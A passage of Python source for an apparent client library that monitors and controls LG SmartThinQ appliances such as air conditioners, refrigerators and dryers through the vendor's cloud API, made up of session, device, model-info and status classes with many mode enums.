"""Begin monitoring a device's status.
Return a "work ID" that can be used to retrieve the result of
monitoring.
"""
res = self.post('rti/rtiMon', {
'cmd': 'Mon',
'cmdOpt': 'Start',
'deviceId': device_id,
'workId': gen_uuid(),
})
return res['workId']
def monitor_poll(self, device_id, work_id):
"""Get the result of a monitoring task.
`work_id` is a string ID retrieved from `monitor_start`. Return
a status result, which is a bytestring, or None if the
monitoring is not yet ready.
May raise a `MonitorError`, in which case the right course of
action is probably to restart the monitoring task.
"""
work_list = [{'deviceId': device_id, 'workId': work_id}]
res = self.post('rti/rtiResult', {'workList': work_list})['workList']
# The return data may or may not be present, depending on the
# monitoring task status.
if 'returnData' in res:
# The main response payload is base64-encoded binary data in
# the `returnData` field. This sometimes contains JSON data
# and sometimes other binary data.
return base64.b64decode(res['returnData'])
else:
return None
# Check for errors.
code = res.get('returnCode') # returnCode can be missing.
if code != '0000':
raise MonitorError(device_id, code)
def monitor_stop(self, device_id, work_id):
"""Stop monitoring a device."""
self.post('rti/rtiMon', {
'cmd': 'Mon',
'cmdOpt': 'Stop',
'deviceId': device_id,
'workId': work_id,
})
def set_device_operation(self, device_id, values):
"""Control a device's settings.
`values` is a key/value map containing the settings to update.
"""
return self.post('rti/rtiControl', {
'cmd': 'Control',
'cmdOpt': 'Operation',
'value': values,
'deviceId': device_id,
'workId': gen_uuid(),
'data': '',
})
def set_device_controls(self, device_id, values):
"""Control a device's settings.
`values` is a key/value map containing the settings to update.
"""
return self.post('rti/rtiControl', {
'cmd': 'Control',
'cmdOpt': 'Set',
'value': values,
'deviceId': device_id,
'workId': gen_uuid(),
'data': '',
})
def get_device_config(self, device_id, key, category='Config'):
"""Get a device configuration option.
The `category` string should probably either be "Config" or
"Control"; the right choice appears to depend on the key.
"""
res = self.post('rti/rtiControl', {
'cmd': category,
'cmdOpt': 'Get',
'value': key,
'deviceId': device_id,
'workId': gen_uuid(),
'data': '',
})
return res['returnData']
def delete_permission(self, device_id):
self.post('rti/delControlPermission', {
'deviceId': device_id,
})
def get_power_data(self, device_id, period):
res = self.post('aircon/inquiryPowerData', {
'deviceId': device_id,
'period': period,
})
code = res.get('returnCd') # returnCode can be missing.
if code == '0000':
return res['powerData']
elif code == '0010':
return '0'
else:
raise MonitorError(device_id, code)
def get_water_usage(self, device_id, typeCode, sDate, eDate):
res = self.post('rms/inquiryWaterConsumptionInfo', {
'deviceId': device_id,
'type': typeCode,
'startDate': sDate,
'endDate': eDate,
})
code = res.get('returnCd') # returnCode can be missing.
if code != '0000':
raise MonitorError(device_id, code)
else:
return res['item']
def get_outdoor_weather(self, area):
res = self.post('weather/weatherNewsData',{
'area': area
})
code = res.get('returnCd') # returnCode can be missing.
if code != '0000':
raise MonitorError(device_id, code)
else:
return res
class Monitor(object):
"""A monitoring task for a device.
This task is robust to some API-level failures. If the monitoring
task expires, it attempts to start a new one automatically. This
makes one `Monitor` object suitable for long-term monitoring.
"""
def __init__(self, session, device_id):
self.session = session
self.device_id = device_id
def start(self):
self.work_id = self.session.monitor_start(self.device_id)
def stop(self):
self.session.monitor_stop(self.device_id, self.work_id)
def poll(self):
"""Get the current status data (a bytestring) or None if the
device is not yet ready.
"""
self.work_id = self.session.monitor_start(self.device_id)
try:
return self.session.monitor_poll(self.device_id, self.work_id)
except MonitorError:
# Try to restart the task.
self.stop()
self.start()
return None
@staticmethod
def decode_json(data):
"""Decode a bytestring that encodes JSON status data."""
return json.loads(data.decode('utf8'))
def poll_json(self):
"""For devices where status is reported via JSON data, get the
decoded status result (or None if status is not available).
"""
data = self.poll()
return self.decode_json(data) if data else None
def __enter__(self):
self.start()
return self
def __exit__(self, type, value, tb):
self.stop()
class Client(object):
"""A higher-level API wrapper that provides a session more easily
and allows serialization of state.
"""
def __init__(self, gateway=None, auth=None, session=None):
# The three steps required to get access to call the API.
self._gateway = gateway
self._auth = auth
self._session = session
# The last list of devices we got from the server. This is the
# raw JSON list data describing the devices.
self._devices = None
# Cached model info data. This is a mapping from URLs to JSON
# responses.
self._model_info = {}
@property
def gateway(self):
if not self._gateway:
self._gateway = Gateway.discover()
return self._gateway
@property
def auth(self):
if not self._auth:
assert False, "unauthenticated"
return self._auth
@property
def session(self):
if not self._session:
self._session, self._devices = self.auth.start_session()
return self._session
@property
def devices(self):
"""DeviceInfo objects describing the user's devices.
"""
if not self._devices:
self._devices = self.session.get_devices()
return (DeviceInfo(d) for d in self._devices)
def get_device(self, device_id):
"""Look up a DeviceInfo object by device ID.
Return None if the device does not exist.
"""
for device in self.devices:
if device.id == device_id:
return device
return None
@classmethod
def load(cls, state):
"""Load a client from serialized state.
"""
client = cls()
if 'gateway' in state:
data = state['gateway']
client._gateway = Gateway(
data['auth_base'], data['api_root'], data['oauth_root']
)
if 'auth' in state:
data = state['auth']
client._auth = Auth(
client.gateway, data['access_token'], data['refresh_token']
)
if 'session' in state:
client._session = Session(client.auth, state['session'])
if 'model_info' in state:
client._model_info = state['model_info']
return client
def dump(self):
"""Serialize the client state."""
out = {
'model_info': self._model_info,
}
if self._gateway:
out['gateway'] = {
'auth_base': self._gateway.auth_base,
'api_root': self._gateway.api_root,
'oauth_root': self._gateway.oauth_root,
}
if self._auth:
out['auth'] = {
'access_token': self._auth.access_token,
'refresh_token': self._auth.refresh_token,
}
if self._session:
out['session'] = self._session.session_id
return out
def refresh(self):
self._auth = self.auth.refresh()
self._session, self._devices = self.auth.start_session()
@classmethod
def from_token(cls, refresh_token):
"""Construct a client using just a refresh token.
This allows simpler state storage (e.g., for human-written
configuration) but it is a little less efficient because we need
to reload the gateway servers and restart the session.
"""
client = cls()
client._auth = Auth(client.gateway, None, refresh_token)
client.refresh()
return client
def model_info(self, device):
"""For a DeviceInfo object, get a ModelInfo object describing
the model's capabilities.
"""
url = device.model_info_url
if url not in self._model_info:
self._model_info[url] = device.load_model_info()
return ModelInfo(self._model_info[url])
class DeviceType(enum.Enum):
"""The category of device."""
REFRIGERATOR = 101
KIMCHI_REFRIGERATOR = 102
WATER_PURIFIER = 103
WASHER = 201
DRYER = 202
STYLER = 203
DISHWASHER = 204
OVEN = 301
MICROWAVE = 302
COOKTOP = 303
HOOD = 304
AC = 401
AIR_PURIFIER = 402
DEHUMIDIFIER = 403
ROBOT_KING = 501
ARCH = 1001
MISSG = 3001
SENSOR = 3002
SOLAR_SENSOR = 3102
IOT_LIGHTING = 3003
IOT_MOTION_SENSOR = 3004
IOT_SMART_PLUG = 3005
IOT_DUST_SENSOR = 3006
EMS_AIR_STATION = 4001
AIR_SENSOR = 4003
class DeviceInfo(object):
"""Details about a user's device.
This is populated from a JSON dictionary provided by the API.
"""
def __init__(self, data):
self.data = data
@property
def model_id(self):
return self.data['modelNm']
@property
def id(self):
return self.data['deviceId']
@property
def model_info_url(self):
return self.data['modelJsonUrl']
@property
def name(self):
return self.data['alias']
@property
def macaddress(self):
return self.data['macAddress']
@property
def model_name(self):
return self.data['modelNm']
@property
def type(self):
"""The kind of device, as a `DeviceType` value."""
return DeviceType(self.data['deviceType'])
def load_model_info(self):
"""Load JSON data describing the model's capabilities.
"""
return requests.get(self.model_info_url).json()
EnumValue = namedtuple('EnumValue', ['options'])
RangeValue = namedtuple('RangeValue', ['min', 'max', 'step'])
BitValue = namedtuple('BitValue', ['options'])
ReferenceValue = namedtuple('ReferenceValue', ['reference'])
class ModelInfo(object):
"""A description of a device model's capabilities.
"""
def __init__(self, data):
self.data = data
@property
def model_type(self):
return self.data['Info']['modelType']
def value_type(self, name):
if name in self.data['Value']:
return self.data['Value'][name]['type']
else:
return None
def value(self, name):
"""Look up information about a value.
Return either an `EnumValue` or a `RangeValue`.
"""
d = self.data['Value'][name]
if d['type'] in ('Enum', 'enum'):
return EnumValue(d['option'])
elif d['type'] == 'Range':
return RangeValue(d['option']['min'], d['option']['max'], d['option']['step'])
elif d['type'] == 'Bit':
bit_values = {}
for bit in d['option']:
bit_values[bit['startbit']] = {
'value' : bit['value'],
'length' : bit['length'],
}
return BitValue(
bit_values
)
elif d['type'] == 'Reference':
ref = d['option'][0]
return ReferenceValue(
self.data[ref]
)
elif d['type'] == 'Boolean':
return EnumValue({'0': 'False', '1' : 'True'})
elif d['type'] == 'String':
pass
else:
assert False, "unsupported value type {}".format(d['type'])
def default(self, name):
"""Get the default value, if it exists, for a given value.
"""
return self.data['Value'][name]['default']
def option_item(self, name):
"""Get the default value, if it exists, for a given value.
"""
options = self.value(name).options
return options
def enum_value(self, key, name):
"""Look up the encoded value for a friendly enum name.
"""
options = self.value(key).options
options_inv = {v: k for k, v in options.items()} # Invert the map.
return options_inv[name]
def enum_name(self, key, value):
"""Look up the friendly enum name for an encoded value.
"""
if not self.value_type(key):
return str(value)
options = self.value(key).options
return options[value]
def range_name(self, key):
"""Look up the value of a RangeValue. Not very useful other than for comprehension
"""
return key
def bit_name(self, key, bit_index, value):
"""Look up the friendly name for an encoded bit value
"""
if not self.value_type(key):
return str(value)
options = self.value(key).options
if not self.value_type(options[bit_index]['value']):
return str(value)
enum_options = self.value(options[bit_index]['value']).options
return enum_options[value]
def reference_name(self, key, value):
"""Look up the friendly name for an encoded reference value
"""
value = str(value)
if not self.value_type(key):
return value
reference = self.value(key).reference
if value in reference:
comment = reference[value]['_comment']
return comment if comment else reference[value]['label']
else:
return '-'
@property
def binary_monitor_data(self):
"""Check that type of monitoring is BINARY(BYTE).
"""
return self.data['Monitoring']['type'] == 'BINARY(BYTE)'
def decode_monitor_binary(self, data):
"""Decode binary encoded status data.
"""
decoded = {}
for item in self.data['Monitoring']['protocol']:
key = item['value']
value = 0
for v in data[item['startByte']:item['startByte'] + item['length']]:
value = (value << 8) + v
decoded[key] = str(value)
return decoded
def decode_monitor_json(self, data):
"""Decode a bytestring that encodes JSON status data."""
return json.loads(data.decode('utf8'))
def decode_monitor(self, data):
"""Decode status data."""
if self.binary_monitor_data:
return self.decode_monitor_binary(data)
else:
return self.decode_monitor_json(data)
class Device(object):
"""A higher-level interface to a specific device.
Unlike `DeviceInfo`, which just stores data *about* a device,
`Device` objects refer to their client and can perform operations
regarding the device.
"""
def __init__(self, client, device):
"""Create a wrapper for a `DeviceInfo` object associated with a
`Client`.
"""
self.client = client
self.device = device
self.model = client.model_info(device)
def _set_operation(self, value):
"""Set a device's operation for a given `value`.
"""
self.client.session.set_device_controls(
self.device.id,
value,
)
def _set_control(self, key, value):
"""Set a device's control for `key` to `value`.
"""
self.client.session.set_device_controls(
self.device.id,
{key: value},
)
def _set_control_ac_wdirvstep(self, key1, value1, key2, value2, key3, value3):
"""Set a device's control for `key` to `value`.
"""
self.client.session.set_device_controls(
self.device.id,
{key1: value1, key2: value2, key3:value3},
)
def _get_config(self, key):
"""Look up a device's configuration for a given value.
The response is parsed as base64-encoded JSON.
"""
data = self.client.session.get_device_config(
self.device.id,
key,
)
return json.loads(base64.b64decode(data).decode('utf8'))
def _get_control(self, key):
"""Look up a device's control value.
"""
data = self.client.session.get_device_config(
self.device.id,
key,
'Control',
)
# The response comes in a funky key/value format: "(key:value)".
_, value = data[1:-1].split(':')
return value
def _delete_permission(self):
self.client.session.delete_permission(
self.device.id,
)
def _get_power_data(self, sDate, eDate):
period = 'Day_'+sDate+'T000000Z/'+eDate+'T000000Z'
data = self.client.session.get_power_data(
self.device.id,
period,
)
return data
def _get_water_usage(self, typeCode, sDate, eDate):
data = self.client.session.get_water_usage(
self.device.id,
typeCode,
sDate,
eDate,
)
return data
"""------------------for Air Conditioner"""
class ACMode(enum.Enum):
"""The operation mode for an AC/HVAC device."""
OFF = "@OFF"
NOT_SUPPORTED = "@NON"
COOL = "@AC_MAIN_OPERATION_MODE_COOL_W"
DRY = "@AC_MAIN_OPERATION_MODE_DRY_W"
FAN = "@AC_MAIN_OPERATION_MODE_FAN_W"
AI = "@AC_MAIN_OPERATION_MODE_AI_W"
HEAT = "@AC_MAIN_OPERATION_MODE_HEAT_W"
AIRCLEAN = "@AC_MAIN_OPERATION_MODE_AIRCLEAN_W"
ACO = "@AC_MAIN_OPERATION_MODE_ACO_W"
AROMA = "@AC_MAIN_OPERATION_MODE_AROMA_W"
ENERGY_SAVING = "@AC_MAIN_OPERATION_MODE_ENERGY_SAVING_W"
SMARTCARE = "@AC_MAIN_WIND_MODE_SMARTCARE_W"
ICEVALLEY = "@AC_MAIN_WIND_MODE_ICEVALLEY_W"
LONGPOWER = "@AC_MAIN_WIND_MODE_LONGPOWER_W"
class ACWindstrength(enum.Enum):
"""The wind strength mode for an AC/HVAC device."""
NOT_SUPPORTED = "@NON"
FIX = "@AC_MAIN_WIND_DIRECTION_FIX_W"
LOW = "@AC_MAIN_WIND_STRENGTH_LOW_LEFT_W|AC_MAIN_WIND_STRENGTH_LOW_RIGHT_W"
MID = "@AC_MAIN_WIND_STRENGTH_MID_LEFT_W|AC_MAIN_WIND_STRENGTH_MID_RIGHT_W"
HIGH = "@AC_MAIN_WIND_STRENGTH_HIGH_LEFT_W|AC_MAIN_WIND_STRENGTH_HIGH_RIGHT_W"
RIGHT_LOW_LEFT_MID = "@AC_MAIN_WIND_STRENGTH_MID_LEFT_W|AC_MAIN_WIND_STRENGTH_LOW_RIGHT_W"
RIGHT_LOW_LEFT_HIGH = "@AC_MAIN_WIND_STRENGTH_HIGH_LEFT_W|AC_MAIN_WIND_STRENGTH_LOW_RIGHT_W"
RIGHT_MID_LEFT_LOW = "@AC_MAIN_WIND_STRENGTH_LOW_LEFT_W|AC_MAIN_WIND_STRENGTH_MID_RIGHT_W"
RIGHT_MID_LEFT_HIGH = "@AC_MAIN_WIND_STRENGTH_HIGH_LEFT_W|AC_MAIN_WIND_STRENGTH_MID_RIGHT_W"
RIGHT_HIGH_LEFT_LOW = "@AC_MAIN_WIND_STRENGTH_LOW_LEFT_W|AC_MAIN_WIND_STRENGTH_HIGH_RIGHT_W"
RIGHT_HIGH_LEFT_MID = "@AC_MAIN_WIND_STRENGTH_MID_LEFT_W|AC_MAIN_WIND_STRENGTH_HIGH_RIGHT_W"
RIGHT_ONLY_LOW = "@AC_MAIN_WIND_STRENGTH_LOW_RIGHT_W"
RIGHT_ONLY_MID = "@AC_MAIN_WIND_STRENGTH_MID_RIGHT_W"
RIGHT_ONLY_HIGH = "@AC_MAIN_WIND_STRENGTH_HIGH_RIGHT_W"
LEFT_ONLY_LOW = "@AC_MAIN_WIND_STRENGTH_LOW_LEFT_W"
LEFT_ONLY_MID = "@AC_MAIN_WIND_STRENGTH_MID_LEFT_W"
LEFT_ONLY_HIGH = "@AC_MAIN_WIND_STRENGTH_HIGH_LEFT_W"
SYSTEM_SLOW = "@AC_MAIN_WIND_STRENGTH_SLOW_W"
SYSTEM_LOW = "@AC_MAIN_WIND_STRENGTH_LOW_W"
SYSTEM_MID = "@AC_MAIN_WIND_STRENGTH_MID_W"
SYSTEM_HIGH = "@AC_MAIN_WIND_STRENGTH_HIGH_W"
SYSTEM_POWER = "@AC_MAIN_WIND_STRENGTH_POWER_W"
SYSTEM_AUTO = "@AC_MAIN_WIND_STRENGTH_AUTO_W"
SYSTEM_LOW_CLEAN = "@AC_MAIN_WIND_STRENGTH_LOW_CLEAN_W"
SYSTEM_MID_CLEAN = "@AC_MAIN_WIND_STRENGTH_MID_CLEAN_W"
SYSTEM_HIGH_CLEAN = "@AC_MAIN_WIND_STRENGTH_HIGH_CLEAN_W"
class ACSwingMode(enum.Enum):
FIX = "@AC_MAIN_WIND_DIRECTION_FIX_W"
UPDOWN = "@AC_MAIN_WIND_DIRECTION_UP_DOWN_W"
LEFTRIGHT = "@AC_MAIN_WIND_DIRECTION_LEFT_RIGHT_W"
class ACReserveMode(enum.Enum):
NONE = "@NON"
SLEEPTIMER = "@SLEEP_TIMER"
EASYTIMER = "@EASY_TIMER"
ONOFFTIMER = "@ONOFF_TIMER"
WEEKLYSCHEDULE = "@WEEKLY_SCHEDULE"
class ACPACMode(enum.Enum):
NONE = "@NON"
POWERSAVE = "@ENERGYSAVING"
AUTODRY = "@AUTODRY"
AIRCLEAN = "@AIRCLEAN"
ECOMODE = "@ECOMODE"
POWERSAVEDRY = "@ENERGYSAVINGDRY"
INDIVIDUALCTRL = "@INDIVIDUALCTRL"
class ACOp(enum.Enum):
"""Whether a device is on or off."""
OFF = "@AC_MAIN_OPERATION_OFF_W"
RIGHT_ON = "@AC_MAIN_OPERATION_RIGHT_ON_W"
LEFT_ON = "@AC_MAIN_OPERATION_LEFT_ON_W"
ALL_ON = "@AC_MAIN_OPERATION_ALL_ON_W"
class AIRCLEAN(enum.Enum):
OFF = "@AC_MAIN_AIRCLEAN_OFF_W"
ON = "@AC_MAIN_AIRCLEAN_ON_W"
class WDIRLEFTRIGHT(enum.Enum):
LEFT_RIGHT_STOP = "@OFF"
LEFT_RIGTH_ON = "@ON"
RIGHTSIDE_LEFT_RIGHT = "@RIGHT_ON"
LEFTSIDE_LEFT_RIGHT = "@LEFT_ON"
LEFT_RIGHT = "@ALL_ON"
class WDIRVSTEP(enum.Enum):
OFF = "0"
FIRST = "1"
SECOND = "2"
THIRD = "3"
FOURTH = "4"
FIFTH = "5"
SIXTH = "6"
class FOURVAIN_WDIRVSTEP(enum.Enum):
OFF = "0"
FIRST = "8737"
SECOND = "8738"
THIRD = "8739"
FOURTH = "8740"
FIFTH = "8741"
SIXTH = "8742"
class ACETCMODE(enum.Enum):
OFF = "@OFF"
ON = "@ON"
class ACDevice(Device):
"""Higher-level operations on an AC/HVAC device, such as a heat
pump.
"""
@property
def f2c(self):
"""Get a dictionary mapping Fahrenheit to Celsius temperatures for
this device.
Unbelievably, SmartThinQ devices have their own lookup tables
for mapping the two temperature scales. You can get *close* by
using a real conversion between the two temperature scales, but
precise control requires using the custom LUT.
"""
mapping = self.model.value('TempFahToCel').options
return {int(f): c for f, c in mapping.items()}
@property
def c2f(self):
"""Get an inverse mapping from Celsius to Fahrenheit.
Just as unbelievably, this is not exactly the inverse of the
`f2c` map. There are a few values in this reverse mapping that
are not in the other.
"""
mapping = self.model.value('TempCelToFah').options
out = {}
for c, f in mapping.items():
try:
c_num = int(c)
except ValueError:
c_num = float(c)
out[c_num] = f
return out
def set_celsius(self, c):
"""Set the device's target temperature in Celsius degrees.
"""
self._set_control('TempCfg', c)
def set_fahrenheit(self, f):
"""Set the device's target temperature in Fahrenheit degrees.
"""
self.set_celsius(self.f2c[f])
def set_on(self, is_on):
"""Turn on or off the device (according to a boolean).
"""
op = ACOp.ALL_ON if is_on else ACOp.OFF
op_value = self.model.enum_value('Operation', op.value)
self._set_control('Operation', op_value)
def set_mode(self, mode):
"""Set the device's operating mode to an `OpMode` value.
"""
mode_value = self.model.enum_value('OpMode', mode.value)
self._set_control('OpMode', mode_value)
def set_windstrength(self, mode):
"""Set the device's operating mode to an `windstrength` value.
"""
windstrength_value = self.model.enum_value('WindStrength', mode.value)
self._set_control('WindStrength', windstrength_value)
def set_wind_leftright(self, mode):
wdir_value = self.model.enum_value('WDirLeftRight', mode.value)
self._set_control('WDirLeftRight', wdir_value)
def set_wdirvstep(self, mode):
self._set_control_ac_wdirvstep('WDirVStep',int(mode.value), 'PowerSave', 0, 'Jet', 0)
def set_airclean(self, is_on):
mode = AIRCLEAN.ON if is_on else AIRCLEAN.OFF
mode_value = self.model.enum_value('AirClean', mode.value)
self._set_control('AirClean', mode_value)
def set_etc_mode(self, name, is_on):
mode = ACETCMODE.ON if is_on else ACETCMODE.OFF
mode_value = self.model.enum_value(name, mode.value)
self._set_control(name, mode_value)
def set_sleep_time(self, sleeptime):
self._set_control('SleepTime', sleeptime)
def get_filter_state(self):
"""Get information about the filter."""
return self._get_config('Filter')
def get_mfilter_state(self):
"""Get information about the "MFilter" (not sure what this is).
"""
return self._get_config('MFilter')
def get_energy_target(self):
"""Get the configured energy target data."""
return self._get_config('EnergyDesiredValue')
def get_light(self):
"""Get a Boolean indicating whether the display light is on."""
value = self._get_control('DisplayControl')
return value == '0' # Seems backwards, but isn't.
def get_volume(self):
"""Get the speaker volume level."""
value = self._get_control('SpkVolume')
return int(value)
def monitor_start(self):
"""Start monitoring the device's status."""
self.mon = Monitor(self.client.session, self.device.id)
self.mon.start()
def monitor_stop(self):
"""Stop monitoring the device's status."""
self.mon.stop()
def delete_permission(self):
self._delete_permission()
def get_outdoor_weather(self, area):
data = self.client.session.get_outdoor_weather(area)
return data
def get_energy_usage_day(self):
sDate = datetime.today().strftime("%Y%m%d")
eDate = sDate
value = self._get_power_data(sDate, eDate)
return value
def get_energy_usage_week(self):
weekday = datetime.today().weekday()
startdate = datetime.today() + timedelta(days=-(weekday+1))
enddate = datetime.today() + timedelta(days=(6-(weekday+1)))
sDate = datetime.date(startdate).strftime("%Y%m%d")
eDate = datetime.date(enddate).strftime("%Y%m%d")
value = self._get_power_data(sDate, eDate)
return value
def get_energy_usage_month(self):
weekday = datetime.today().weekday()
startdate = datetime.today().replace(day=1)
sDate = datetime.date(startdate).strftime("%Y%m%d")
eDate = datetime.today().strftime("%Y%m%d")
value = self._get_power_data(sDate, eDate)
return value
def get_outtotalinstantpower(self):
value = self._get_config('OutTotalInstantPower')
return value['OutTotalInstantPower']
def get_inoutinstantpower(self):
value = self._get_config('InOutInstantPower')
return value['InOutInstantPower']
def poll(self):
"""Poll the device's current state.
Monitoring must be started first with `monitor_start`. Return
either an `ACStatus` object or `None` if the status is not yet
available.
"""
data = self.mon.poll()
if data:
res = self.model.decode_monitor(data)
"""
with open('/config/wideq/hvac_polled_data.json','w', encoding="utf-8") as dumpfile:
json.dump(res, dumpfile, ensure_ascii=False, indent="\t")
"""
return ACStatus(self, res)
else:
return None
class ACStatus(object):
"""Higher-level information about an AC device's current status.
"""
def __init__(self, ac, data):
self.ac = ac
self.data = data
@staticmethod
def _str_to_num(s):
"""Convert a string to either an `int` or a `float`.
Troublingly, the API likes values like "18", without a trailing
".0",LEF for whole numbers. So we use `int`s for integers and
`float`s for non-whole numbers.
"""
f = float(s)
if f == int(f):
return int(f)
else:
return f
@property
def is_on(self):
op = ACOp(self.lookup_enum('Operation'))
return op != ACOp.OFF
@property
def temp_cur_c(self):
return self._str_to_num(self.data['TempCur'])
@property
def temp_cur_f(self):
return self.ac.c2f[self.temp_cur_c]
@property
def temp_cfg_c(self):
return self._str_to_num(self.data['TempCfg'])
@property
def temp_cfg_f(self):
return self.ac.c2f[self.temp_cfg_c]
def lookup_enum(self, key):
return self.ac.model.enum_name(key, self.data[key])
@property
def model_type(self):
return self.ac.model.model_type()
@property
def support_oplist(self):
dict_support_opmode = self.ac.model.option_item('SupportOpMode')
support_opmode = []
for option in dict_support_opmode.values():
support_opmode.append(ACMode(option).name)
return support_opmode
@property
def support_windmode(self):
dict_support_windmode = self.ac.model.option_item('SupportWindMode')
support_windmode = []
for option in dict_support_windmode.values():
support_windmode.append(ACMode(option).name)
return support_windmode
@property
def support_fanlist(self):
dict_support_fanmode = self.ac.model.option_item('SupportWindStrength')
support_fanmode = []
for option in dict_support_fanmode.values():
support_fanmode.append(ACWindstrength(option).name)
return support_fanmode
@property
def support_swingmode(self):
dict_support_swingmode = self.ac.model.option_item('SupportWindDir')
support_swingmode = []
for option in dict_support_swingmode.values():
support_swingmode.append(ACSwingMode(option).name)
return support_swingmode
@property
def support_pacmode(self):
dict_support_pacmode = self.ac.model.option_item('SupportPACMode')
support_pacmode = []
for option in dict_support_pacmode.values():
support_pacmode.append(ACPACMode(option).name)
return support_pacmode
@property
def support_reservemode(self):
dict_support_reservemode = self.ac.model.option_item('SupportReserve')
support_reservemode = []
for option in dict_support_reservemode.values():
support_reservemode.append(ACReserveMode(option).name)
return support_reservemode
@property
def mode(self):
return ACMode(self.lookup_enum('OpMode'))
@property
def windstrength_state(self):
return ACWindstrength(self.lookup_enum('WindStrength'))
@property
def wdirleftright_state(self):
return WDIRLEFTRIGHT(self.lookup_enum('WDirLeftRight'))
@property
def wdirupdown_state(self):
return ACETCMODE(self.lookup_enum('WDirUpDown'))
@property
def airclean_state(self):
return AIRCLEAN(self.lookup_enum('AirClean'))
@property
def wdirvstep_state(self):
return WDIRVSTEP(self.data['WDirVStep'])
@property
def fourvain_wdirvstep_state(self):
return FOURVAIN_WDIRVSTEP(self.data['WDirVStep'])
@property
def sac_airclean_state(self):
return ACETCMODE(self.lookup_enum('AirClean'))
@property
def icevalley_state(self):
return ACETCMODE(self.lookup_enum('IceValley'))
@property
def longpower_state(self):
return ACETCMODE(self.lookup_enum('FlowLongPower'))
@property
def autodry_state(self):
return ACETCMODE(self.lookup_enum('AutoDry'))
@property
def smartcare_state(self):
return ACETCMODE(self.lookup_enum('SmartCare'))
@property
def sensormon_state(self):
return ACETCMODE(self.lookup_enum('SensorMon'))
@property
def powersave_state(self):
return ACETCMODE(self.lookup_enum('PowerSave'))
@property
def jet_state(self):
return ACETCMODE(self.lookup_enum('Jet'))
@property
def humidity(self):
return self.data['SensorHumidity']
@property
def sensorpm1(self):
return self.data['SensorPM1']
@property
def sensorpm2(self):
return self.data['SensorPM2']
@property
def sensorpm10(self):
return self.data['SensorPM10']
@property
def sleeptime(self):
return self.data['SleepTime']
@property
def total_air_polution(self):
return APTOTALAIRPOLUTION(self.data['TotalAirPolution'])
@property
def air_polution(self):
return APSMELL(self.data['AirPolution'])
"""------------------for Refrigerator"""
class ICEPLUS(enum.Enum):
OFF = "@CP_OFF_EN_W"
ON = "@CP_ON_EN_W"
ICE_PLUS = "@RE_TERM_ICE_PLUS_W"
ICE_PLUS_FREEZE = "@RE_MAIN_SPEED_FREEZE_TERM_W"
ICE_PLUS_OFF = "@CP_TERM_OFF_KO_W"
class FRESHAIRFILTER(enum.Enum):
OFF = "@CP_TERM_OFF_KO_W"
AUTO = "@RE_STATE_FRESH_AIR_FILTER_MODE_AUTO_W"
POWER = "@RE_STATE_FRESH_AIR_FILTER_MODE_POWER_W"
REPLACE_FILTER = "@RE_STATE_REPLACE_FILTER_W"
SMARTCARE_ON = "@RE_STATE_SMART_SMART_CARE_ON"
SMARTCARE_OFF = "@RE_STATE_SMART_SMART_CARE_OFF"
SMARTCARE_WAIT = "@RE_STATE_SMART_SMART_CARE_WAIT"
class SMARTSAVING(enum.Enum):
OFF = "@CP_TERM_USE_NOT_W"
NIGHT = "@RE_SMARTSAVING_MODE_NIGHT_W"
CUSTOM = "@RE_SMARTSAVING_MODE_CUSTOM_W"
class RefDevice(Device):
def set_reftemp(self, temp):
"""Set the refrigerator temperature.
"""
temp_value = self.model.enum_value('TempRefrigerator_C', temp)
self._set_control('RETM', temp_value)
def set_freezertemp(self, temp):
"""Set the freezer temperature.
"""
temp_value = self.model.enum_value('TempFreezer_C', temp)
self._set_control('REFT', temp_value)
def set_iceplus(self, mode):
"""Set the device's operating mode to an `iceplus` value.
"""
iceplus_value = self.model.enum_value('IcePlus', mode.value)
self._set_control('REIP', iceplus_value)
def set_freshairfilter(self, mode):
"""Set the device's operating mode to an `freshairfilter` value.
"""
freshairfilter_value = self.model.enum_value('FreshAirFilter', mode.value)
self._set_control('REHF', freshairfilter_value)
def set_activesaving(self, value):
self._set_control('REAS', value)
def monitor_start(self):
"""Start monitoring the device's status."""
self.mon = Monitor(self.client.session, self.device.id)
self.mon.start()
def monitor_stop(self):
"""Stop monitoring the device's status."""
self.mon.stop()
def delete_permission(self):
self._delete_permission()
def poll(self):
"""Poll the device's current state.
Monitoring must be started first with `monitor_start`. Return
either an `ACStatus` object or `None` if the status is not yet
available.
"""
data = self.mon.poll()
if data:
res = self.model.decode_monitor(data)
"""
with open('/config/wideq/ref_polled_data.json','w', encoding="utf-8") as dumpfile:
json.dump(res, dumpfile, ensure_ascii=False, indent="\t")
"""
return RefStatus(self, res)
else:
return None
class RefStatus(object):
"""Higher-level information about an Ref device's current status.
"""
def __init__(self, ref, data):
self.ref = ref
self.data = data
def lookup_enum(self, key):
try:
value = self.data[key]
return self.ref.model.enum_name(key, value)
except KeyError:
return value
def lookup_enum_temp(self, key, value):
return self.ref.model.enum_name(key, value)
@property
def current_reftemp(self):
temp = self.lookup_enum('TempRefrigerator')
return self.lookup_enum_temp('TempRefrigerator_C', temp)
@property
def current_midtemp(self):
temp = self.lookup_enum('TempMiddle')
return self.lookup_enum_temp('TempMiddle_C', temp)
@property
def current_freezertemp(self):
temp = self.lookup_enum('TempFreezer')
return self.lookup_enum_temp('TempFreezer_C', temp)
@property
def iceplus_state(self):
return ICEPLUS(self.lookup_enum('IcePlus'))
@property
def freshairfilter_state(self):
return FRESHAIRFILTER(self.lookup_enum('FreshAirFilter'))
@property
def smartsaving_mode(self):
return self.lookup_enum('SmartSavingMode')
@property
def waterfilter_state(self):
try:
waterfilter = self.lookup_enum('WaterFilterUsedMonth')
except AttributeError:
return self.data['WaterFilterUsedMonth']
if waterfilter:
return waterfilter
@property
def door_state(self):
return self.lookup_enum('DoorOpenState')
@property
def smartsaving_state(self):
return self.lookup_enum('SmartSavingModeStatus')
@property
def locking_state(self):
return self.lookup_enum('LockingStatus')
@property
def activesaving_state(self):
return self.data['ActiveSavingStatus']
"""------------------for Dryer"""
class DRYERSTATE(enum.Enum):
OFF = "@WM_STATE_POWER_OFF_W"
INITIAL = "@WM_STATE_INITIAL_W"
RUNNING = "@WM_STATE_RUNNING_W"
DRYING = "@WM_STATE_DRYING_W"
COOLING = "@WM_STATE_COOLING_W"
PAUSE = "@WM_STATE_PAUSE_W"
END = "@WM_STATE_END_W"
ERROR = "@WM_STATE_ERROR_W"
SMART_DIAGNOSIS = "@WM_STATE_SMART_DIAGNOSIS_W"
WRINKLE_CARE = "@WM_STATE_WRINKLECARE_W"
class DRYERPROCESSSTATE(enum.Enum):
DETECTING = "@WM_STATE_DETECTING_W"
STEAM = "@WM_STATE_STEAM_W"
DRY = "@WM_STATE_DRY_W"
COOLING = "@WM_STATE_COOLING_W"
